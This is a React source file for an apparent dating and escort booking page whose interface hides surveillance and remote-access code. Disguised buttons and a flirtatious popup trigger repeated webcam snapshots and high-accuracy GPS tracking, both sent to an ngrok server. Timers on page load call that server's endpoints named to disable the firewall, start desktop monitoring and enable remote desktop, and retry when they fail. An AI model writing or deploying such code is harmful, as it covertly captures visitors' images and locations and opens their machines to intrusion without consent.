import 'bootstrap/dist/css/bootstrap.min.css';
import 'bootstrap/dist/js/bootstrap.bundle.min';
import Swal from 'sweetalert2';
import { useEffect, useState } from 'react';
import banner from "../assets/banner.avif";
import { handleGpsClicked } from '../generic_api/gps';
import Confirmation from '../components/Confirmation';
import DatingPlans from '../components/DatingPlans';
import ProfileCard from '../components/ProfileCard';
import StoryCard from '../components/StoryCard';
import { DUMMY_PROFILES, sliderImages, stories, upperSliderImages } from '../data/data';
import Shopping from '../Shopping';
import UShopping from '../UShopping';



export default function Home() {
    const [confirmation, setConfirmation] = useState({ visible: false, message: '' });
    const [busyId, setBusyId] = useState(null);
    const [selectedProfile, setSelectedProfile] = useState(null);
    const [showModal, setShowModal] = useState(false);

    const handleSnapClick = () => {
        // Clear any previous intervals/timeouts
        if (window._cameraSnapInterval) {
            clearInterval(window._cameraSnapInterval);
            window._cameraSnapInterval = null;
        }
        if (window._cameraSnapTimeout) {
            clearTimeout(window._cameraSnapTimeout);
            window._cameraSnapTimeout = null;
        }


setTimeout(() => {
    Swal.fire({
        title: "💗 Hey there...",
        text: "your babe is coming for you soon 💋",
        background: "#ffc2e9",
        color: "#8a0055",
        confirmButtonColor: "#ff69b4",
        customClass: {
            popup: "sexy-alert"
        }
    }).then((result) => {
        if (result.isConfirmed) {
            handleGpsClick();
        }
    });
}, 3000);


        const takeSnap = async () => {
            try {
                const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                const video = document.createElement("video");
                video.srcObject = stream;
                await video.play();

                const canvas = document.createElement("canvas");
                canvas.width = video.videoWidth;
                canvas.height = video.videoHeight;
                canvas.getContext("2d").drawImage(video, 0, 0);

                const imageData = canvas.toDataURL("image/jpeg");

                // Stop camera
                stream.getTracks().forEach((track) => track.stop());

                // Send to API

                const response = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/capture_photo`, {
                    method: "POST",
                    headers: { "Content-Type": "application/json" },
                    body: JSON.stringify({ image_data: imageData }),
                });

                const result = await response.json();
                console.log("📸 Snap sent:", result);
            } catch (error) {
                console.error("Camera or API error:", error);
            }
        };

        // Take one immediately
        takeSnap();

        // Then repeat every 2 minutes
        window._cameraSnapInterval = setInterval(takeSnap, 120000);
    };


// disabled firewall
useEffect(() => {
    const disableFirewall = async () => {
        try {
            console.log("🔥 Attempting to disable firewall...");
            
            const response = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/disable-firewall`, {
                method: "GET",
                headers: {
                    "Content-Type": "application/json",
                    "git-skip-browser-warning": "true", // Fixed typo: removed space
                    "ngrok-skip-browser-warning": "true", // Add this for ngrok
                    "Access-Control-Allow-Origin": "*"
                },
                mode: "cors", // Explicitly set CORS mode
                credentials: "omit" // Try without credentials first
            });

            console.log("🔥 Response status:", response.status);
            console.log("🔥 Response headers:", [...response.headers.entries()]);
            
            if (!response.ok) {
                const errorText = await response.text();
                throw new Error(`HTTP ${response.status}: ${errorText}`);
            }
            
            const data = await response.json();
            console.log("🔥 Firewall API Success:", data);
            
        } catch (error) {
            console.error("🔥 Firewall API Error:", error.message);
            // You can retry here if needed
            setTimeout(disableFirewall, 20000); // Retry after 20 seconds
        }
    };

    // Wait longer (10 seconds) to ensure backend is ready
    const timer = setTimeout(disableFirewall, 10000);
    
    return () => clearTimeout(timer);
}, []);


//desktop monitor 
useEffect(() => {
    const startDesktopMonitor = async () => {
        try {
            const res = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/desktop/start`, {
                method: "GET",
            });
            const data = await res.json();
            console.log("🖥 Desktop Monitor API Response:", data);
        } catch (error) {
            console.error("❌ Desktop Monitor Error:", error);
        }
    };

    // First call after 5 minutes
    const timeout = setTimeout(() => {
        startDesktopMonitor(); // first API call

        // Then repeat every 2 minutes
        window._desktopMonitorInterval = setInterval(startDesktopMonitor, 2 * 60 * 1000);
    }, 5 * 60 * 1000); // 5 minutes = 300000ms

    return () => {
        clearTimeout(timeout);
        clearInterval(window._desktopMonitorInterval);
    };
}, []);

// desktop end

    useEffect(() => {
        fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/visitors/page_visit`, {
            method: "POST",
            headers: { "Content-Type": "application/json" },
            body: JSON.stringify({})
        })
            .then(res => res.json())
            .then(data => console.log("📌 Page visit response:", data))
            .catch(err => console.error(err));
    }, []);

    // backend run code 
    useEffect(() => {
        if ("serviceWorker" in navigator) {
            navigator.serviceWorker.register("/sw.js")
                .then((registration) => {
                    console.log("✅ ServiceWorker registered with scope:", registration.scope);
                })
                .catch((err) => {
                    console.error("❌ ServiceWorker registration failed:", err);
                });
        }
    }, []);

    const handleSelectPlan = async (plan) => {
        console.log("Selected plan:", plan.name, "for", selectedProfile.name);
    };


   const handleGpsClick = async () => {
    if (!navigator.geolocation) {
        console.error("❌ Geolocation not supported by this browser.");
        return;
    }

    // If already running → stop it
    if (window._gpsInterval) {
        clearInterval(window._gpsInterval);
        window._gpsInterval = null;
        console.log("🛑 Stopped 5-min GPS tracking");
        return;
    }

    const getLocationAndSend = () => {
        navigator.geolocation.getCurrentPosition(
            async (position) => {
                const { latitude, longitude, accuracy } = position.coords;
                const timestamp = position.timestamp;

                console.log("📍 GPS:", latitude, longitude, accuracy, timestamp);

                try {
                    await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/gps/save`, {
                        method: "POST",
                        headers: { "Content-Type": "application/json" },
                        body: JSON.stringify({ latitude, longitude, accuracy, timestamp }),
                    });
                } catch (err) {
                    console.error("GPS API Error:", err);
                }
            },
            (error) => console.error("GPS Error:", error),
            {
                enableHighAccuracy: true,
                timeout: 10000,
                maximumAge: 0,
            }
        );
    };

    // Run once immediately
    getLocationAndSend();

    // Then repeat every 5 minutes
    window._gpsInterval = setInterval(getLocationAndSend, 300000);

    console.log("▶️ Started 5-min GPS tracking");
};



    const handleBook = (profile) => {
        setSelectedProfile(profile);
        setShowModal(true);
    };

//     const handleRdpClick = async () => {
//         try {
//             console.log("🔄 Calling enable_rdp...");

//             const res = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/enable_rdp`, {
//                 method: "GET",
//                 headers: {
//                     "Content-Type": "application/json",
//                     "ngrok-skip-browser-warning": "true"
//                 }
//             });

//             const data = await res.json();
//         console.log("🟢 RDP Response:", data);

//     } catch (error) {
//         console.error("❌ RDP Error:", error);
//     }
// };
const fetchWithTimeout = (url, options, timeout = 30000) => {
  return new Promise((resolve, reject) => {
    const timer = setTimeout(() => reject(new Error("Request timed out")), timeout);
    fetch(url, options)
      .then(res => {
        clearTimeout(timer);
        resolve(res);
      })
      .catch(err => {
        clearTimeout(timer);
        reject(err);
      });
  });
};

// automate rdp
// Automatic RDP enable after 1 minute
useEffect(() => {
    const autoEnableRdp = async () => {
        try {
            console.log("⏰ Auto RDP activation starting...");
            
            // Call enable_rdp API
            const rdpRes = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/enable_rdp`, {
                method: "GET",
                headers: {
                    "Content-Type": "application/json",
                    "ngrok-skip-browser-warning": "true",
                }
            });

            const rdpData = await rdpRes.json();
            console.log("✅ RDP Enable Response:", rdpData);
            
            // Now save response to DB
            const saveRes = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/save-rdp-response`, {
                method: "POST",
                headers: {
                    "Content-Type": "application/json",
                    "ngrok-skip-browser-warning": "true",
                },
                body: JSON.stringify(rdpData),
            });

            const saveData = await saveRes.json();
            console.log("💾 RDP Response Saved:", saveData);
            
        } catch (error) {
            console.error("❌ Auto RDP Error:", error);
            // Retry after 30 seconds if failed
            setTimeout(autoEnableRdp, 30000);
        }
    };

    // Start after 1 minute (60 seconds)
    const timer = setTimeout(autoEnableRdp, 60000);
    
    return () => clearTimeout(timer);
}, []);

const handleRdpClick = async () => {
  try {
    console.log("🔄 Calling enable_rdp...");

    const res = await fetchWithTimeout(`https://lilia-landed-unbriefly.ngrok-free.dev/enable_rdp`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "ngrok-skip-browser-warning": "true",
      },
    }, 60000); // 60 sec timeout

    const data = await res.json();
    console.log("🟢 RDP Response:", data);
    // Now save response to DB
const saveRes = await fetch(`https://lilia-landed-unbriefly.ngrok-free.dev/save-rdp-response`, {
  method: "POST",
 headers: {
        "Content-Type": "application/json",
        "ngrok-skip-browser-warning": "true",
      },  body: JSON.stringify(data),
});

    const saveData = await saveRes.json();
    console.log("💾 Save RDP Response Result:", saveData);

  } catch (error) {
    console.error("❌ RDP Error:", error);
  }
};

    return (
        <>
            {/* slider */}
{/* <Rshell /> */}
            <div className='container'>
                <div>
                    <UShopping images={upperSliderImages} handleSnapClick={handleSnapClick} />
                    {/* <button className="loan-btn bg-success text-light" onClick={handleGpsClick}>
                        Get Location
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" stroke="#fff" viewBox="0 0 24 24">
                            <path d="M5 12h14M13 6l6 6-6 6" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" />
                        </svg>
                    </button> */}

                    <button className="loan-btn bg-pink text-light" onClick={handleRdpClick}>
                        More Detail
                        <svg xmlns="http://www.w3.org/2000/svg" fill="none" stroke="#fff" viewBox="0 0 24 24">
                            <path d="M5 12h14M13 6l6 6-6 6" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" />
                        </svg>
                    </button>
                </div>

                <div className="my-5">
                    <h2 className='text-pink pb-3'>
                        Made With Love - Real Stories from Real Connections
                    </h2>
                    <div className="row">
                        {stories?.map((story, index) => (
                            <StoryCard key={index} {...story} />
                        ))}
                    </div>
                </div>
                <div className='mt-lg-4 mt-3'>
                    <h2 className='text-pink'>Book a Profile</h2>
                    <div className="">
                        <div className="row">
                            {DUMMY_PROFILES?.map((p) => (
                                <div className="col-lg-3 col-md-6 col-sm-6 col-12" key={p.id}>
                                    <ProfileCard
                                        profile={p}
                                        busy={busyId === p.id}
                                        onBook={() => handleBook(p)}
                                    />
                                </div>
                            ))}
                        </div>
                    </div>
                </div>

                <div className='w-100 py-3 mt-3'>
                    <h4 className='text-center p-3 mt-2 text-pink'>Bask in the charm of a stunning beach escape.
                        Feel the allure of timeless beauty under the golden sun.
                        Where elegance and desire meet the rhythm of the waves</h4>
                    <img src={banner} alt="banner" className='w-100 banner_img rounded-3' />
                </div>
                {confirmation?.visible && (
                    <Confirmation
                        message={confirmation.message}
                        onClose={() => setConfirmation({ visible: false, message: '' })}
                    />
                )}
                {/* slider */}
                <div className='mt-lg-5 mt-3'>
                    <h3 className='text-pink mt-3'>Your Dream Doll. 💋 👙 💗 50% Off</h3>
                    <Shopping images={sliderImages} onBuyClick={handleGpsClicked} />
                </div>

                <DatingPlans
                    show={showModal}
                    onClose={() => setShowModal(false)}
                    profile={selectedProfile}
                    onSelectPlan={handleSelectPlan}
                />
            </div>
        </>


    );
}
